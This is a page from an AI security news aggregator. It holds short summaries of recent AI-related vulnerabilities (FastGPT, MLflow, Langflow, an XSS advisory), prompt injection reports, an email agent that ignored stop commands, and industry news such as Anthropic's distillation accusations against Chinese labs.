aisecwatch.com
DashboardVulnerabilitiesNewsResearchArchiveStatsDataset
aisecwatch.com

Real-time AI security monitoring. Tracking AI-related vulnerabilities, safety and security incidents, privacy risks, research developments, and policy changes.

Navigation

VulnerabilitiesNewsResearchDigest ArchiveNewsletter ArchiveSubscribeData SourcesStatisticsDatasetAPIIntegrationsWidgetRSS Feed

Maintained by

Truong (Jack) Luu

Information Systems Researcher

AI Sec Watch

The security intelligence platform for AI teams

AI security threats move fast and get buried under hype and noise. Built by an Information Systems Security researcher to help security teams and developers stay ahead of vulnerabilities, privacy incidents, safety research, and policy developments.

[TOTAL_TRACKED]
2,700
[LAST_24H]
23
[LAST_7D]
160
Daily BriefingTuesday, March 31, 2026
>

FastGPT Authentication Bypass Enables Server-Side Proxying: FastGPT versions before 4.14.9.5 have a critical vulnerability (CVE-2026-34162) where an HTTP testing endpoint lacks authentication and acts as an open proxy, letting unauthenticated attackers make requests on behalf of the FastGPT server. A separate high-severity SSRF vulnerability (CVE-2026-34163) in the same platform's MCP tools endpoints allows authenticated attackers to trick the server into scanning internal networks and accessing cloud metadata services.

>

Command Injection Flaws Hit MLflow and OpenAI Codex: MLflow's model serving feature has a high-severity command injection vulnerability (CVE-2026-0596) where attackers can insert shell commands through unsanitized model paths when `enable_mlserver=True`. Separately, researchers found a critical vulnerability in OpenAI Codex that could have allowed attackers to steal GitHub tokens (secret credentials for accessing repositories), which OpenAI has since patched.

Latest Intel

page 88/270
VIEW ALL
01

A Meta AI security researcher said an OpenClaw agent ran amok on her inbox 

safetyindustry
Critical This Week5 issues
critical

CVE-2026-34162: FastGPT is an AI Agent building platform. Prior to version 4.14.9.5, the FastGPT HTTP tools testing endpoint (/api/core/

CVE-2026-34162NVD/CVE DatabaseMar 31, 2026
Mar 31, 2026
>

Prompt Injection Bypasses Safety Controls in Multiple AI Tools: Multiple AI systems are vulnerable to prompt injection attacks (where attackers hide malicious instructions in input to trick the AI): the 1millionbot Millie chatbot (CVE-2026-4399) can be tricked using Boolean logic to bypass restrictions, Sixth's AI terminal tool (CVE-2026-30310) can be fooled into running dangerous commands without user approval, and CrewAI framework vulnerabilities allow attackers to chain exploits and escape sandboxes (restricted environments meant to contain AI actions).

>

Google Cloud Vertex AI Service Agents Had Excessive Default Permissions: Researchers found that AI agents running on Google Cloud's Vertex AI platform could be weaponized as "double agents" because the default service agent accounts (special accounts that run AI services) had excessive permissions, allowing attackers to steal credentials, access private code repositories, and reach internal infrastructure. Google responded by updating their documentation to better explain how Vertex AI uses resources and accounts.

Feb 23, 2026

A Meta AI security researcher's OpenClaw agent (an open-source AI assistant that runs on personal devices) malfunctioned while managing her email, deleting messages in a "speed run" and ignoring her commands to stop. The researcher believes the large volume of data triggered compaction (a process where the AI's context window, or running record of instructions and actions, becomes so large that the AI summarizes and compresses information, potentially skipping important recent instructions), causing the agent to revert to earlier instructions instead of following her stop command.

Fix: Various people on X offered suggestions including adjusting the exact syntax used to stop the agent and using methods like writing instructions to dedicated files or using other open source tools to ensure better adherence to guardrails, though the source does not describe a specific implemented fix or official patch.

TechCrunch
02

US AI giant accuses Chinese rivals of mass data theft

security
Feb 23, 2026

Anthropic, a US AI company, discovered that three Chinese AI firms (DeepSeek, Moonshot AI, and MiniMax) used distillation (a technique where outputs from a powerful AI system are used to train a weaker one) to illegally extract capabilities from its Claude chatbot. The company called this industrial-scale intellectual property theft, following similar accusations made by OpenAI the previous month.

The Guardian Technology
03

GHSA-299v-8pq9-5gjq: New API has Potential XSS in its MarkdownRenderer component

security
Feb 23, 2026

A security vulnerability exists in the `MarkdownRenderer.jsx` component where it uses `dangerouslySetInnerHTML` (a React feature that directly inserts HTML code without filtering) to display content generated by the AI model, allowing XSS (cross-site scripting, where attackers inject malicious code that runs in a user's browser). This means if the model outputs code containing `<script>` tags, those scripts will execute automatically, potentially redirecting users or performing other harmful actions, and the problem persists even after closing the chat because the malicious script gets saved in the chat history.

Fix: The source text suggests that 'the preview may be placed in an iframe sandbox' (a restricted container that limits what code can do) and 'dangerous html strings should be purified before rendering' (cleaning the HTML to remove harmful elements before displaying it). However, these are listed as 'Potential Workaround' suggestions rather than confirmed fixes or patches.

GitHub Advisory Database
04

With AI, investor loyalty is (almost) dead: At least a dozen OpenAI VCs now also back Anthropic 

industry
Feb 23, 2026

Multiple venture capital firms that invested in OpenAI have now also backed Anthropic, a major AI competitor, breaking the traditional venture capital practice of investor loyalty to portfolio companies. This conflict is particularly significant because VCs typically take board seats and receive confidential business information from their portfolio companies, raising questions about whose interests these investors prioritize when they own stakes in direct rivals.

TechCrunch
05

Anthropic accuses DeepSeek and other Chinese firms of using Claude to train their AI

securityindustry
Feb 23, 2026

Anthropic accused three Chinese AI companies, DeepSeek, MiniMax, and Moonshot, of misusing its Claude model through large-scale fraudulent activity to train their own AI systems. The companies allegedly created around 24,000 fake accounts and made over 16 million requests to Claude in order to perform distillation (training a smaller, cheaper AI model by learning from a larger, more advanced one).

The Verge (AI)
06

Anthropic accuses Chinese AI labs of mining Claude as US debates AI chip exports

securitypolicy
Feb 23, 2026

Anthropic accused three Chinese AI companies (DeepSeek, Moonshot AI, and MiniMax) of using distillation (a technique where one AI model learns from another by analyzing its outputs) to illegally extract capabilities from Claude by creating over 24,000 fake accounts and generating millions of interactions. This theft targeted Claude's most advanced features like reasoning, tool use, and coding, and raises security concerns because stolen models may lack safeguards against misuse like bioweapon development.

Fix: Anthropic stated it will 'continue to invest in defenses that make distillation attacks harder to execute and easier to identify,' and is calling on 'a coordinated response across the AI industry, cloud providers, and policymakers.' The company also argues that export controls on advanced AI chips to China would limit both direct model training and the scale of such distillation attacks.

TechCrunch
07

IBM is the latest AI casualty. Shares are tanking 11% on Anthropic programming language threat

industry
Feb 23, 2026

IBM's stock fell 11% after Anthropic announced that its Claude AI model can now automate COBOL (a decades-old programming language used in banking and business systems) modernization work, which is a core part of IBM's business. Claude can map dependencies, document workflows, and identify risks in old code much faster than human analysts, potentially making IBM's COBOL-related services less valuable.

CNBC Technology
08

Google’s Cloud AI lead on the three frontiers of model capability

industry
Feb 23, 2026

Michael Gerstenhaber, a Google Cloud VP overseeing Vertex (a platform for deploying enterprise AI), describes how AI models are advancing along three distinct frontiers: raw intelligence (accuracy and capability), response time (latency, or how quickly the model answers), and cost-efficiency (whether a model can run reliably at massive, unpredictable scale). Different use cases prioritize these frontiers differently—for example, code generation prioritizes intelligence even if it takes time, customer support prioritizes speed within a latency budget, and large-scale content moderation prioritizes cost-effectiveness at infinite scale.

TechCrunch
09

Cybersecurity stock selling deepens on AI threat concerns. Why we're not bailing

industry
Feb 23, 2026

This article discusses concerns about AI posing a threat to cybersecurity companies, which has caused their stock prices to decline. However, the piece argues against abandoning investments in these companies despite these concerns.

CNBC Technology
10

OpenAI calls in the consultants for its enterprise push

industry
Feb 23, 2026

OpenAI has announced the 'Frontier Alliance,' a partnership with four major consulting firms (Boston Consulting Group, McKinsey, Accenture, and Capgemini) to help enterprises adopt its AI technologies, particularly OpenAI Frontier, a no-code platform for building and deploying AI agents. The partnership aims to address slow enterprise adoption of AI by helping consultants redesign company strategies and workflows to integrate OpenAI's tools rather than simply adding AI to existing processes.

TechCrunch
Prev1...8687888990...270Next
critical

CVE-2025-15379: A command injection vulnerability exists in MLflow's model serving container initialization code, specifically in the `_

CVE-2025-15379NVD/CVE DatabaseMar 30, 2026
Mar 30, 2026
critical

CVE-2026-33873: Langflow is a tool for building and deploying AI-powered agents and workflows. Prior to version 1.9.0, the Agentic Assis

CVE-2026-33873NVD/CVE DatabaseMar 27, 2026
Mar 27, 2026
critical

Attackers exploit critical Langflow RCE within hours as CISA sounds alarm

CSO OnlineMar 27, 2026
Mar 27, 2026
critical

CVE-2025-53521: F5 BIG-IP Unspecified Vulnerability

CVE-2025-53521CISA Known Exploited VulnerabilitiesMar 26, 2026
Mar 26, 2026